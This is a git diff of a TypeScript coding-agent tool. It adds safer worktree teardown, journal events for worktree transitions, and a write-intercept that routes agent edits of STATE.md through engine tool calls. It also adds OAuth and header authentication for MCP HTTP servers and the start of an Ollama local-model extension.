+  if (existsSync(gitmodulesPath)) {
+    try {
+      const submoduleStatus = execFileSync(
+        "git", ["submodule", "status"], 
+        { cwd: resolvedWtPath, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" },
+      ).trim();
+      // Lines starting with '+' indicate uncommitted submodule changes
+      hasSubmoduleChanges = submoduleStatus.split("\n").some(
+        (line: string) => line.startsWith("+") || line.startsWith("-"),
+      );
+      if (hasSubmoduleChanges) {
+        // Stash submodule changes so they are not lost during force removal.
+        // The stash is created in the worktree before it's torn down.
+        try {
+          execFileSync(
+            "git", ["stash", "push", "-m", "gsd: auto-stash submodule changes before worktree teardown"],
+            { cwd: resolvedWtPath, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" },
+          );
+          logWarning("reconcile", `Stashed uncommitted submodule changes before worktree teardown`, { worktree: name, path: resolvedWtPath });
+        } catch {
+          // Stash failed — warn the user that submodule changes may be lost
+          logWarning("reconcile", `Submodule changes detected — stash failed, changes may be lost during force removal`, { worktree: name, path: resolvedWtPath });
+        }
+      }
+    } catch (e) {
+      logWarning("worktree", `submodule status check failed: ${(e as Error).message}`);
+    }
+  }
 
-  // If the directory is still there (e.g. locked), try harder with force
-  if (existsSync(resolvedWtPath)) {
-    try { nativeWorktreeRemove(basePath, resolvedWtPath, true); } catch { /* may fail */ }
+  // Nested .git safety (#2616): detect nested .git directories created by
+  // scaffolding tools (create-next-app, cargo init, etc.). These produce
+  // gitlink entries (mode 160000) without .gitmodules — cleanup would destroy
+  // the only copy of the nested object database, causing permanent data loss.
+  // Fix: remove the nested .git dirs so git tracks the files as regular content.
+  const nestedGitDirs = findNestedGitDirs(resolvedWtPath);
+  if (nestedGitDirs.length > 0) {
+    for (const nestedDir of nestedGitDirs) {
+      const nestedGitPath = join(nestedDir, ".git");
+      try {
+        rmSync(nestedGitPath, { recursive: true, force: true });
+        logWarning("reconcile",
+          `Removed nested .git directory from scaffolded project to prevent data loss (#2616)`,
+          { worktree: name, nestedRepo: nestedDir },
+        );
+      } catch {
+        logWarning("reconcile",
+          `Failed to remove nested .git directory — files may be lost as orphaned gitlink`,
+          { worktree: name, nestedRepo: nestedDir },
+        );
+      }
+    }
+  }
+
+  // Remove worktree — only use force/rmSync when the path is safely contained
+  if (resolvedPathSafe) {
+    // Remove worktree: try non-force first when submodules have changes,
+    // falling back to force only after submodule state has been preserved.
+    const useForce = hasSubmoduleChanges ? false : force;
+    try { nativeWorktreeRemove(basePath, resolvedWtPath, useForce); } catch (e) { logWarning("worktree", `nativeWorktreeRemove failed: ${(e as Error).message}`); }
+
+    // If the directory is still there (e.g. locked), try harder with force
+    if (existsSync(resolvedWtPath)) {
+      try { nativeWorktreeRemove(basePath, resolvedWtPath, true); } catch (e) { logWarning("worktree", `nativeWorktreeRemove (force) failed: ${(e as Error).message}`); }
+    }
+
+    // (#2821) If the worktree directory STILL exists after both native removal
+    // attempts (e.g. untracked files like ASSESSMENT/UAT-RESULT prevent git
+    // worktree remove), force-remove the git internal worktree metadata first,
+    // then remove the filesystem directory. Without this, the .git/worktrees/<name>
+    // lock prevents rmSync from cleaning up, and the orphaned worktree directory
+    // causes every subsequent `/gsd auto` to re-enter the stale worktree.
+    if (existsSync(resolvedWtPath)) {
+      try {
+        const wtInternalDir = join(basePath, ".git", "worktrees", name);
+        if (existsSync(wtInternalDir)) {
+          rmSync(wtInternalDir, { recursive: true, force: true });
+        }
+        rmSync(resolvedWtPath, { recursive: true, force: true });
+        if (wtPath !== resolvedWtPath && existsSync(wtPath)) {
+          rmSync(wtPath, { recursive: true, force: true });
+        }
+      } catch {
+        logWarning(
+          "reconcile",
+          `Worktree directory could not be removed after git internal cleanup: ${resolvedWtPath}. ` +
+            `Manual cleanup: rm -rf "${resolvedWtPath.replaceAll("\\", "/")}"`,
+          { worktree: name },
+        );
+      }
+    }
+  } else {
+    // Path is outside containment — only do a non-force git worktree remove
+    // (which refuses to delete dirty worktrees) and never fall back to rmSync.
+    console.error(
+      `[GSD] WARNING: Resolved worktree path is outside .gsd/worktrees/: ${resolvedWtPath}\n` +
+        `  Skipping forced removal to prevent data loss.`,
+    );
+    try { nativeWorktreeRemove(basePath, resolvedWtPath, false); } catch (e) { logWarning("worktree", `non-force worktree remove failed for ${resolvedWtPath}: ${e instanceof Error ? e.message : String(e)}`); }
   }
 
   // Prune stale entries so git knows the worktree is gone
   nativeWorktreePrune(basePath);
 
   if (deleteBranch) {
-    try { nativeBranchDelete(basePath, branch, true); } catch { /* branch may not exist */ }
+    try { nativeBranchDelete(basePath, branch, true); } catch (e) { logWarning("worktree", `final branch delete failed: ${(e as Error).message}`); }
   }
 }
 
diff --git a/src/resources/extensions/gsd/worktree-resolver.ts b/src/resources/extensions/gsd/worktree-resolver.ts
index 4a7723eee..484c0a7f9 100644
--- a/src/resources/extensions/gsd/worktree-resolver.ts
+++ b/src/resources/extensions/gsd/worktree-resolver.ts
@@ -14,9 +14,12 @@
  */
 
 import { existsSync, unlinkSync } from "node:fs";
+import { randomUUID } from "node:crypto";
 import { join } from "node:path";
 import type { AutoSession } from "./auto/session.js";
 import { debugLog } from "./debug-logger.js";
+import { MergeConflictError } from "./git-service.js";
+import { emitJournalEvent } from "./journal.js";
 
 // ─── Dependency Interface ──────────────────────────────────────────────────
 
@@ -63,7 +66,6 @@ export interface WorktreeResolverDeps {
   captureIntegrationBranch: (
     basePath: string,
     mid: string,
-    opts?: { commitDocs?: boolean },
   ) => void;
 }
 
@@ -148,6 +150,18 @@ export class WorktreeResolver {
    */
   enterMilestone(milestoneId: string, ctx: NotifyCtx): void {
     this.validateMilestoneId(milestoneId);
+
+    // If worktree creation failed earlier this session, skip all future attempts
+    if (this.s.isolationDegraded) {
+      debugLog("WorktreeResolver", {
+        action: "enterMilestone",
+        milestoneId,
+        skipped: true,
+        reason: "isolation-degraded",
+      });
+      return;
+    }
+
     if (!this.deps.shouldUseWorktreeIsolation()) {
       debugLog("WorktreeResolver", {
         action: "enterMilestone",
@@ -155,6 +169,13 @@ export class WorktreeResolver {
         skipped: true,
         reason: "isolation-disabled",
       });
+      emitJournalEvent(this.s.originalBasePath || this.s.basePath, {
+        ts: new Date().toISOString(),
+        flowId: randomUUID(),
+        seq: 0,
+        eventType: "worktree-skip",
+        data: { milestoneId, reason: "isolation-disabled" },
+      });
       return;
     }
 
@@ -184,6 +205,13 @@ export class WorktreeResolver {
         result: "success",
         wtPath,
       });
+      emitJournalEvent(this.s.originalBasePath || this.s.basePath, {
+        ts: new Date().toISOString(),
+        flowId: randomUUID(),
+        seq: 0,
+        eventType: "worktree-enter",
+        data: { milestoneId, wtPath, created: !existingPath },
+      });
       ctx.notify(`Entered worktree for ${milestoneId} at ${wtPath}`, "info");
     } catch (err) {
       const msg = err instanceof Error ? err.message : String(err);
@@ -193,10 +221,20 @@ export class WorktreeResolver {
         result: "error",
         error: msg,
       });
+      emitJournalEvent(this.s.originalBasePath || this.s.basePath, {
+        ts: new Date().toISOString(),
+        flowId: randomUUID(),
+        seq: 0,
+        eventType: "worktree-create-failed",
+        data: { milestoneId, error: msg, fallback: "project-root" },
+      });
       ctx.notify(
         `Auto-worktree creation for ${milestoneId} failed: ${msg}. Continuing in project root.`,
         "warning",
       );
+      // Degrade isolation for the rest of this session so mergeAndExit
+      // doesn't try to merge a nonexistent worktree branch (#2483)
+      this.s.isolationDegraded = true;
       // Do NOT update s.basePath — stay in project root
     }
   }
@@ -281,6 +319,22 @@ export class WorktreeResolver {
    */
   mergeAndExit(milestoneId: string, ctx: NotifyCtx): void {
     this.validateMilestoneId(milestoneId);
+
+    // If worktree creation failed earlier, skip merge — work is on current branch (#2483)
+    if (this.s.isolationDegraded) {
+      debugLog("WorktreeResolver", {
+        action: "mergeAndExit",
+        milestoneId,
+        skipped: true,
+        reason: "isolation-degraded",
+      });
+      ctx.notify(
+        `Skipping worktree merge for ${milestoneId} — isolation was degraded (worktree creation failed earlier). Work is on the current branch.`,
+        "info",
+      );
+      return;
+    }
+
     const mode = this.deps.getIsolationMode();
     debugLog("WorktreeResolver", {
       action: "mergeAndExit",
@@ -288,8 +342,21 @@ export class WorktreeResolver {
       mode,
       basePath: this.s.basePath,
     });
+    emitJournalEvent(this.s.originalBasePath || this.s.basePath, {
+      ts: new Date().toISOString(),
+      flowId: randomUUID(),
+      seq: 0,
+      eventType: "worktree-merge-start",
+      data: { milestoneId, mode },
+    });
 
-    if (mode === "none") {
+    // #2625: If we are physically inside an auto-worktree, we MUST merge
+    // regardless of the current isolation config. This prevents data loss when
+    // the default isolation mode changes between versions (e.g., "worktree" ->
+    // "none"): the worktree branch still holds real commits that need merging.
+    const inWorktree = this.deps.isInAutoWorktree(this.s.basePath) && this.s.originalBasePath;
+
+    if (mode === "none" && !inWorktree) {
       debugLog("WorktreeResolver", {
         action: "mergeAndExit",
         milestoneId,
@@ -300,8 +367,7 @@ export class WorktreeResolver {
     }
 
     if (
-      mode === "worktree" ||
-      (this.deps.isInAutoWorktree(this.s.basePath) && this.s.originalBasePath)
+      mode === "worktree" || inWorktree
     ) {
       this._mergeWorktreeMode(milestoneId, ctx);
     } else if (mode === "branch") {
@@ -371,6 +437,20 @@ export class WorktreeResolver {
           milestoneId,
           roadmapContent,
         );
+
+        // #2945 Bug 3: mergeMilestoneToMain performs best-effort worktree
+        // cleanup internally (step 12), but it can silently fail on Windows
+        // or when the worktree directory is locked. Perform a secondary
+        // teardown here to ensure the worktree is properly cleaned up.
+        // This is idempotent — if the worktree was already removed,
+        // teardownAutoWorktree handles the no-op case gracefully.
+        try {
+          this.deps.teardownAutoWorktree(originalBase, milestoneId);
+        } catch {
+          // Best-effort — the primary cleanup in mergeMilestoneToMain may
+          // have already removed the worktree.
+        }
+
         if (mergeResult.codeFilesChanged) {
           ctx.notify(
             `Milestone ${milestoneId} merged to main.${mergeResult.pushed ? " Pushed to remote." : ""}`,
@@ -408,12 +488,20 @@ export class WorktreeResolver {
         error: msg,
         fallback: "chdir-to-project-root",
       });
+      emitJournalEvent(this.s.originalBasePath || this.s.basePath, {
+        ts: new Date().toISOString(),
+        flowId: randomUUID(),
+        seq: 0,
+        eventType: "worktree-merge-failed",
+        data: { milestoneId, error: msg },
+      });
       // Surface a clear, actionable error. The worktree and milestone branch are
       // intentionally preserved — nothing has been deleted. The user can retry
-      // /complete-milestone or merge manually once the underlying issue is fixed
-      // (e.g. checkout to wrong branch, unresolved conflicts). (#1668)
+      // /gsd dispatch complete-milestone or merge manually once the underlying
+      // issue is fixed (e.g. checkout to wrong branch, unresolved conflicts).
+      // (#1668, #1891)
       ctx.notify(
-        `Milestone merge failed: ${msg}. Your worktree and milestone branch are preserved — retry /complete-milestone or merge manually.`,
+        `Milestone merge failed: ${msg}. Your worktree and milestone branch are preserved — retry with \`/gsd dispatch complete-milestone\` or merge manually.`,
         "warning",
       );
 
@@ -434,6 +522,12 @@ export class WorktreeResolver {
           /* best-effort */
         }
       }
+
+      // Re-throw MergeConflictError so the auto loop can detect real code
+      // conflicts and stop instead of retrying forever (#2330).
+      if (err instanceof MergeConflictError) {
+        throw err;
+      }
     }
 
     // Always restore basePath and rebuild — whether merge succeeded or failed
diff --git a/src/resources/extensions/gsd/worktree.ts b/src/resources/extensions/gsd/worktree.ts
index 6d089f92d..c6bbf6af2 100644
--- a/src/resources/extensions/gsd/worktree.ts
+++ b/src/resources/extensions/gsd/worktree.ts
@@ -42,6 +42,16 @@ function getService(basePath: string): GitServiceImpl {
   return cachedService;
 }
 
+/**
+ * Clear the cached GitServiceImpl. For testing only — forces the next
+ * getService() call to re-read preferences and create a fresh instance.
+ * @internal
+ */
+export function _resetServiceCache(): void {
+  cachedService = null;
+  cachedBasePath = null;
+}
+
 /**
  * Set the active milestone ID on the cached GitServiceImpl.
  * This enables integration branch resolution in getMainBranch().
@@ -57,13 +67,13 @@ export function setActiveMilestoneId(basePath: string, milestoneId: string | nul
  * record when the user starts from a different branch (#300). Always a no-op
  * if on a GSD slice branch.
  */
-export function captureIntegrationBranch(basePath: string, milestoneId: string, options?: { commitDocs?: boolean }): void {
+export function captureIntegrationBranch(basePath: string, milestoneId: string): void {
   // In a worktree, the base branch is implicit (worktree/<name>).
   // Writing it to META.json would leave stale metadata after merge back to main.
   if (detectWorktreeName(basePath)) return;
   const svc = getService(basePath);
   const current = svc.getCurrentBranch();
-  writeIntegrationBranch(basePath, milestoneId, current, options);
+  writeIntegrationBranch(basePath, milestoneId, current);
 }
 
 // ─── Pure Utility Functions (unchanged) ────────────────────────────────────
@@ -235,8 +245,9 @@ export function getSliceBranchName(milestoneId: string, sliceId: string, worktre
   return `gsd/${milestoneId}/${sliceId}`;
 }
 
-/** Regex that matches both plain and worktree-namespaced slice branches. */
-export const SLICE_BRANCH_RE = /^gsd\/(?:([a-zA-Z0-9_-]+)\/)?(M\d+(?:-[a-z0-9]{6})?)\/(S\d+)$/;
+/** Re-export for backward compatibility — canonical definition in branch-patterns.ts */
+export { SLICE_BRANCH_RE } from "./branch-patterns.js";
+import { SLICE_BRANCH_RE } from "./branch-patterns.js";
 
 /**
  * Parse a slice branch name into its components.
diff --git a/src/resources/extensions/gsd/write-intercept.ts b/src/resources/extensions/gsd/write-intercept.ts
new file mode 100644
index 000000000..833cc2023
--- /dev/null
+++ b/src/resources/extensions/gsd/write-intercept.ts
@@ -0,0 +1,90 @@
+// GSD Extension — Write Intercept for Agent State File Blocks
+// Detects agent attempts to write authoritative state files and returns
+// an error directing the agent to use the engine tool API instead.
+
+import { realpathSync } from "node:fs";
+import { resolve } from "node:path";
+
+/**
+ * Patterns matching authoritative .gsd/ state files that agents must NOT write directly.
+ *
+ * Only STATE.md is blocked — it is purely engine-rendered from DB state.
+ * All other .gsd/ files are agent-authored content that agents create and
+ * update during discuss, plan, and execute phases:
+ * - REQUIREMENTS.md — agents create during discuss, read during planning
+ * - PROJECT.md — agents create during discuss, update at milestone close
+ * - ROADMAP.md / PLAN.md — agents create during planning, engine renders checkboxes
+ * - SUMMARY.md, KNOWLEDGE.md, CONTEXT.md — non-authoritative content
+ */
+const BLOCKED_PATTERNS: RegExp[] = [
+  // STATE.md is the only purely engine-rendered file.
+  // Case-insensitive to prevent bypass on macOS (case-insensitive APFS).
+  // (^|[/\\]) matches both absolute paths (/project/.gsd/…) and bare relative
+  // paths (.gsd/STATE.md) so a path without a leading separator is also blocked.
+  /(^|[/\\])\.gsd[/\\]STATE\.md$/i,
+  // Also match resolved symlink paths under ~/.gsd/projects/ (Pitfall #6)
+  /(^|[/\\])\.gsd[/\\]projects[/\\][^/\\]+[/\\]STATE\.md$/i,
+];
+
+/**
+ * Bash command patterns that target STATE.md.
+ * Covers common shell write patterns: redirect, tee, cp, mv, sed -i, etc.
+ */
+const BASH_STATE_PATTERNS: RegExp[] = [
+  // Redirect/pipe writes: > STATE.md, >> STATE.md, >| STATE.md
+  /[>|]+\s*\S*STATE\.md/i,
+  // tee to STATE.md
+  /\btee\b.*STATE\.md/i,
+  // cp/mv targeting STATE.md
+  /\b(cp|mv)\b.*STATE\.md/i,
+  // sed -i editing STATE.md
+  /\bsed\b.*-i.*STATE\.md/i,
+  // dd output to STATE.md
+  /\bdd\b.*of=\S*STATE\.md/i,
+];
+
+/**
+ * Tests whether the given file path matches a blocked authoritative .gsd/ state file.
+ * Resolves `..` segments via path.resolve() and attempts realpathSync for symlinks.
+ */
+export function isBlockedStateFile(filePath: string): boolean {
+  // Check raw path first
+  if (matchesBlockedPattern(filePath)) return true;
+
+  // Resolve ".." segments (works even for non-existing files)
+  const resolved = resolve(filePath);
+  if (resolved !== filePath && matchesBlockedPattern(resolved)) return true;
+
+  // Also try symlink resolution — file may not exist yet, so wrap in try/catch
+  try {
+    const realpath = realpathSync(filePath);
+    if (realpath !== filePath && realpath !== resolved && matchesBlockedPattern(realpath)) return true;
+  } catch {
+    // File doesn't exist yet — path matching above is sufficient
+  }
+
+  return false;
+}
+
+/**
+ * Tests whether a bash command appears to target STATE.md for writing.
+ */
+export function isBashWriteToStateFile(command: string): boolean {
+  return BASH_STATE_PATTERNS.some((pattern) => pattern.test(command));
+}
+
+function matchesBlockedPattern(path: string): boolean {
+  return BLOCKED_PATTERNS.some((pattern) => pattern.test(path));
+}
+
+/**
+ * Error message returned when an agent attempts to directly write an authoritative .gsd/ state file.
+ * Directs the agent to use engine tool calls instead.
+ */
+export const BLOCKED_WRITE_ERROR = `Direct writes to .gsd/STATE.md are blocked. Use engine tool calls instead:
+- To complete a task: call gsd_complete_task(milestone_id, slice_id, task_id, summary)
+- To complete a slice: call gsd_complete_slice(milestone_id, slice_id, summary, uat_result)
+- To save a decision: call gsd_save_decision(scope, decision, choice, rationale)
+- To start a task: call gsd_start_task(milestone_id, slice_id, task_id)
+- To record verification: call gsd_record_verification(milestone_id, slice_id, task_id, evidence)
+- To report a blocker: call gsd_report_blocker(milestone_id, slice_id, task_id, description)`;
diff --git a/src/resources/extensions/mcp-client/auth.ts b/src/resources/extensions/mcp-client/auth.ts
new file mode 100644
index 000000000..52a3f86c8
--- /dev/null
+++ b/src/resources/extensions/mcp-client/auth.ts
@@ -0,0 +1,149 @@
+/**
+ * MCP Client OAuth / Auth helpers
+ *
+ * Builds transport options (headers, OAuthClientProvider) from MCP server
+ * config entries so that HTTP transports can authenticate with remote
+ * servers (Sentry, Linear, etc.).
+ *
+ * Fixes #2160 — MCP HTTP transport lacked an OAuth auth provider.
+ */
+
+import type { OAuthClientProvider } from "@modelcontextprotocol/sdk/client/auth.js";
+import type { StreamableHTTPClientTransportOptions } from "@modelcontextprotocol/sdk/client/streamableHttp.js";
+
+// ─── Types ────────────────────────────────────────────────────────────────────
+
+export interface McpHttpAuthHeaders {
+	/** Static headers to attach to every request, e.g. `{ Authorization: "Bearer ${TOKEN}" }`. */
+	headers?: Record<string, string>;
+}
+
+export interface McpHttpOAuthConfig {
+	/** OAuth configuration for servers that require the full OAuth flow. */
+	oauth?: {
+		clientId: string;
+		clientSecret?: string;
+		scopes?: string[];
+		redirectUrl?: string;
+	};
+}
+
+/** Union of all auth-related config fields for an HTTP MCP server. */
+export type McpHttpAuthConfig = McpHttpAuthHeaders & McpHttpOAuthConfig;
+
+// ─── Env resolution ───────────────────────────────────────────────────────────
+
+/** Resolve `${VAR}` references in a string against `process.env`. */
+function resolveEnvValue(value: string): string {
+	return value.replace(
+		/\$\{([^}]+)\}/g,
+		(_match, varName) => process.env[varName] ?? "",
+	);
+}
+
+function resolveHeaders(raw: Record<string, string>): Record<string, string> {
+	const resolved: Record<string, string> = {};
+	for (const [key, value] of Object.entries(raw)) {
+		resolved[key] = typeof value === "string" ? resolveEnvValue(value) : value;
+	}
+	return resolved;
+}
+
+// ─── OAuth provider (minimal CLI-friendly implementation) ─────────────────────
+
+/**
+ * Creates a minimal `OAuthClientProvider` suitable for CLI / headless use.
+ *
+ * This provider supports:
+ *  - Pre-configured client credentials (client_id, optional client_secret)
+ *  - Token storage in memory (per-session)
+ *  - Scopes
+ *
+ * For full interactive OAuth flows (browser redirect), a richer provider would
+ * be needed, but for server-to-server and pre-authed scenarios this is
+ * sufficient.
+ */
+function createCliOAuthProvider(config: NonNullable<McpHttpOAuthConfig["oauth"]>): OAuthClientProvider {
+	let storedTokens: { access_token: string; token_type: string; refresh_token?: string } | undefined;
+	let storedCodeVerifier = "";
+
+	return {
+		get redirectUrl() {
+			return config.redirectUrl ?? "http://localhost:0/callback";
+		},
+
+		get clientMetadata() {
+			return {
+				redirect_uris: [config.redirectUrl ?? "http://localhost:0/callback"],
+				client_name: "gsd",
+				...(config.scopes ? { scope: config.scopes.join(" ") } : {}),
+			};
+		},
+
+		clientInformation() {
+			return {
+				client_id: config.clientId,
+				...(config.clientSecret ? { client_secret: config.clientSecret } : {}),
+			};
+		},
+
+		tokens() {
+			return storedTokens;
+		},
+
+		saveTokens(tokens) {
+			storedTokens = tokens as typeof storedTokens;
+		},
+
+		redirectToAuthorization(authorizationUrl: URL) {
+			// In a CLI context we can't open a browser automatically.
+			// Log the URL so the user can manually visit it.
+			// eslint-disable-next-line no-console
+			console.error(
+				`[MCP OAuth] Authorization required. Visit:\n  ${authorizationUrl.toString()}`,
+			);
+		},
+
+		saveCodeVerifier(codeVerifier: string) {
+			storedCodeVerifier = codeVerifier;
+		},
+
+		codeVerifier() {
+			return storedCodeVerifier;
+		},
+	};
+}
+
+// ─── Public API ───────────────────────────────────────────────────────────────
+
+/**
+ * Build `StreamableHTTPClientTransportOptions` from an MCP server config's
+ * auth-related fields.
+ *
+ * Supports two auth strategies:
+ *  1. **`headers`** — static Authorization (or other) headers, with `${VAR}` env resolution.
+ *  2. **`oauth`**  — full OAuthClientProvider for servers that implement MCP OAuth.
+ *
+ * When both are provided, `oauth` takes precedence (the SDK's built-in OAuth
+ * flow handles token refresh automatically).
+ */
+export function buildHttpTransportOpts(
+	authConfig: McpHttpAuthConfig,
+): StreamableHTTPClientTransportOptions {
+	const opts: StreamableHTTPClientTransportOptions = {};
+
+	// OAuth takes precedence
+	if (authConfig.oauth) {
+		opts.authProvider = createCliOAuthProvider(authConfig.oauth);
+		return opts;
+	}
+
+	// Static headers (with env var resolution)
+	if (authConfig.headers && Object.keys(authConfig.headers).length > 0) {
+		opts.requestInit = {
+			headers: resolveHeaders(authConfig.headers),
+		};
+	}
+
+	return opts;
+}
diff --git a/src/resources/extensions/mcp-client/index.ts b/src/resources/extensions/mcp-client/index.ts
index 904fbbcb4..3cfb5b51b 100644
--- a/src/resources/extensions/mcp-client/index.ts
+++ b/src/resources/extensions/mcp-client/index.ts
@@ -25,6 +25,8 @@ import { StdioClientTransport } from "@modelcontextprotocol/sdk/client/stdio.js"
 import { StreamableHTTPClientTransport } from "@modelcontextprotocol/sdk/client/streamableHttp.js";
 import { readFileSync, existsSync } from "node:fs";
 import { join } from "node:path";
+import { buildHttpTransportOpts } from "./auth.js";
+import type { McpHttpAuthConfig } from "./auth.js";
 
 // ─── Types ────────────────────────────────────────────────────────────────────
 
@@ -36,6 +38,10 @@ interface McpServerConfig {
 	env?: Record<string, string>;
 	url?: string;
 	cwd?: string;
+	/** Static headers for HTTP transport (supports ${VAR} env resolution). */
+	headers?: Record<string, string>;
+	/** OAuth config for HTTP transport. */
+	oauth?: McpHttpAuthConfig["oauth"];
 }
 
 interface McpToolSchema {
@@ -87,6 +93,9 @@ function readConfigs(): McpServerConfig[] {
 						? "http"
 						: "unknown";
 
+				const hasHeaders = hasUrl && config.headers && typeof config.headers === "object";
+				const hasOAuth = hasUrl && config.oauth && typeof config.oauth === "object";
+
 				servers.push({
 					name,
 					transport,
@@ -99,6 +108,8 @@ function readConfigs(): McpServerConfig[] {
 						cwd: typeof config.cwd === "string" ? config.cwd : undefined,
 					}),
 					...(hasUrl && { url: config.url as string }),
+					headers: hasHeaders ? config.headers as Record<string, string> : undefined,
+					oauth: hasOAuth ? config.oauth as McpHttpAuthConfig["oauth"] : undefined,
 				});
 			}
 		} catch {
@@ -111,7 +122,11 @@ function readConfigs(): McpServerConfig[] {
 }
 
 function getServerConfig(name: string): McpServerConfig | undefined {
-	return readConfigs().find((s) => s.name === name);
+	const trimmed = name.trim();
+	return readConfigs().find((s) =>
+		s.name === trimmed ||
+		s.name.toLowerCase() === trimmed.toLowerCase(),
+	);
 }
 
 /** Resolve ${VAR} references in env values against process.env. */
@@ -131,12 +146,14 @@ function resolveEnv(env: Record<string, string>): Record<string, string> {
 }
 
 async function getOrConnect(name: string, signal?: AbortSignal): Promise<Client> {
-	const existing = connections.get(name);
-	if (existing) return existing.client;
-
 	const config = getServerConfig(name);
 	if (!config) throw new Error(`Unknown MCP server: "${name}". Use mcp_servers to list available servers.`);
 
+	// Always use config.name as the canonical cache key so that variant
+	// casing / whitespace still hits the same connection.
+	const existing = connections.get(config.name);
+	if (existing) return existing.client;
+
 	const client = new Client({ name: "gsd", version: "1.0.0" });
 	let transport: StdioClientTransport | StreamableHTTPClientTransport;
 
@@ -149,13 +166,21 @@ async function getOrConnect(name: string, signal?: AbortSignal): Promise<Client>
 			stderr: "pipe",
 		});
 	} else if (config.transport === "http" && config.url) {
-		transport = new StreamableHTTPClientTransport(new URL(config.url));
+		const resolvedUrl = config.url.replace(
+			/\$\{([^}]+)\}/g,
+			(_, varName) => process.env[varName] ?? "",
+		);
+		const httpOpts = buildHttpTransportOpts({
+			headers: config.headers,
+			oauth: config.oauth,
+		});
+		transport = new StreamableHTTPClientTransport(new URL(resolvedUrl), httpOpts);
 	} else {
-		throw new Error(`Server "${name}" has unsupported transport: ${config.transport}`);
+		throw new Error(`Server "${config.name}" has unsupported transport: ${config.transport}`);
 	}
 
 	await client.connect(transport, { signal, timeout: 30000 });
-	connections.set(name, { client, transport });
+	connections.set(config.name, { client, transport });
 	return client;
 }
 
@@ -209,6 +234,26 @@ function formatToolList(serverName: string, tools: McpToolSchema[]): string {
 	return lines.join("\n");
 }
 
+// ─── Status helper (consumed by /gsd mcp) ─────────────────────────────────────
+
+/**
+ * Return the live connection status for a named MCP server.
+ * Safe to call even when the server has never been connected.
+ */
+export function getConnectionStatus(name: string): {
+	connected: boolean;
+	tools: string[];
+	error?: string;
+} {
+	const conn = connections.get(name);
+	const cached = toolCache.get(name);
+	return {
+		connected: !!conn,
+		tools: cached ? cached.map((t) => t.name) : [],
+		error: undefined,
+	};
+}
+
 // ─── Extension ────────────────────────────────────────────────────────────────
 
 export default function (pi: ExtensionAPI) {
diff --git a/src/resources/extensions/mcp-client/tests/server-name-spaces.test.ts b/src/resources/extensions/mcp-client/tests/server-name-spaces.test.ts
new file mode 100644
index 000000000..1cdb30f6e
--- /dev/null
+++ b/src/resources/extensions/mcp-client/tests/server-name-spaces.test.ts
@@ -0,0 +1,55 @@
+/**
+ * Regression test for #3029 — mcp_discover fails for server names with spaces.
+ *
+ * The getServerConfig lookup must handle:
+ *   1. Exact match (already works)
+ *   2. Names with leading/trailing whitespace (trimming)
+ *   3. Case-insensitive matching (e.g. "Langgraph code" vs "langgraph Code")
+ *
+ * We test at the source level since getServerConfig is not exported.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { dirname, join } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const source = readFileSync(join(__dirname, "..", "index.ts"), "utf-8");
+
+test("#3029: getServerConfig trims whitespace from input name", () => {
+	assert.ok(
+		source.includes(".trim()"),
+		"getServerConfig should trim the input name before comparison",
+	);
+});
+
+test("#3029: getServerConfig performs case-insensitive matching", () => {
+	assert.ok(
+		source.includes(".toLowerCase()"),
+		"getServerConfig should compare names case-insensitively",
+	);
+});
+
+test("#3029: getOrConnect normalizes name for connection cache lookup", () => {
+	// The connections Map key must use the canonical (config) name, not the
+	// raw user input, so that subsequent lookups hit the cache even when the
+	// user's casing differs.
+	const getOrConnectMatch = source.match(
+		/async function getOrConnect\(name: string[\s\S]*?const existing = connections\.get\(/,
+	);
+	assert.ok(
+		getOrConnectMatch,
+		"getOrConnect function should exist",
+	);
+	// After the fix, getOrConnect should normalize the name via getServerConfig
+	// or use config.name as the canonical cache key.
+	assert.ok(
+		source.includes("connections.get(config.name") ||
+		source.includes("connections.set(config.name"),
+		"getOrConnect should use config.name (canonical) as the connections cache key",
+	);
+});
diff --git a/src/resources/extensions/ollama/index.ts b/src/resources/extensions/ollama/index.ts
new file mode 100644
index 000000000..7f87c6e77
--- /dev/null
+++ b/src/resources/extensions/ollama/index.ts
@@ -0,0 +1,131 @@
+// GSD2 — Ollama Extension: First-class local LLM support
+/**
+ * Ollama Extension
+ *
+ * Auto-detects a running Ollama instance, discovers locally pulled models,
+ * and registers them as a first-class provider. No configuration required —
+ * if Ollama is running, models appear automatically.
+ *
+ * Features:
+ * - Auto-discovery of local models via /api/tags
+ * - Capability detection (vision, reasoning, context window)
+ * - /ollama slash commands for model management
+ * - ollama_manage tool for LLM-driven model operations
+ * - Zero-cost model registration (local inference)
+ *
+ * Respects OLLAMA_HOST env var for non-default endpoints.
+ */
+
+import { importExtensionModule, type ExtensionAPI } from "@gsd/pi-coding-agent";
+import * as client from "./ollama-client.js";
+import { discoverModels } from "./ollama-discovery.js";
+import { registerOllamaCommands } from "./ollama-commands.js";
+import { streamOllamaChat } from "./ollama-chat-provider.js";
+
+let toolsPromise: Promise<void> | null = null;
+
+async function registerOllamaTools(pi: ExtensionAPI): Promise<void> {
+	if (!toolsPromise) {
+		toolsPromise = (async () => {
+			const { registerOllamaTool } = await importExtensionModule<
+				typeof import("./ollama-tool.js")
+			>(import.meta.url, "./ollama-tool.js");
+			registerOllamaTool(pi);
+		})().catch((error) => {
+			toolsPromise = null;
+			throw error;
+		});
+	}
+	return toolsPromise;
+}
+
+/** Track whether we've registered models so we can clean up on shutdown */
+let providerRegistered = false;
+
+/**
+ * Probe Ollama and register discovered models.
+ * Safe to call multiple times — re-discovers and re-registers.
+ */
+async function probeAndRegister(pi: ExtensionAPI): Promise<boolean> {
+	const running = await client.isRunning();
+	if (!running) {
+		if (providerRegistered) {
+			pi.unregisterProvider("ollama");
+			providerRegistered = false;
+		}
+		return false;
+	}
+
+	const models = await discoverModels();
+	if (models.length === 0) return true; // Running but no models pulled
+
+	const baseUrl = client.getOllamaHost();
+
+	// Use authMode "apiKey" with a dummy key (#3440).
+	// authMode "none" requires a custom streamSimple handler, but Ollama uses
+	// the standard OpenAI-compatible streaming endpoint. Ollama ignores the
+	// Authorization header so the dummy key is harmless.
+	pi.registerProvider("ollama", {
+		authMode: "apiKey",
+		apiKey: "ollama",
+		baseUrl,
+		api: "ollama-chat",
+		streamSimple: streamOllamaChat,
+		isReady: () => true,
+		models: models.map((m) => ({
+			id: m.id,
